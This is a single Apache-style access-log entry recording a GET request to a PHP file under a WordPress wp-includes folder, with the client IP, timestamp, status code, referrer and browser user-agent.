69.197.149.50 - - [18/Sep/2025:02:12:25 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
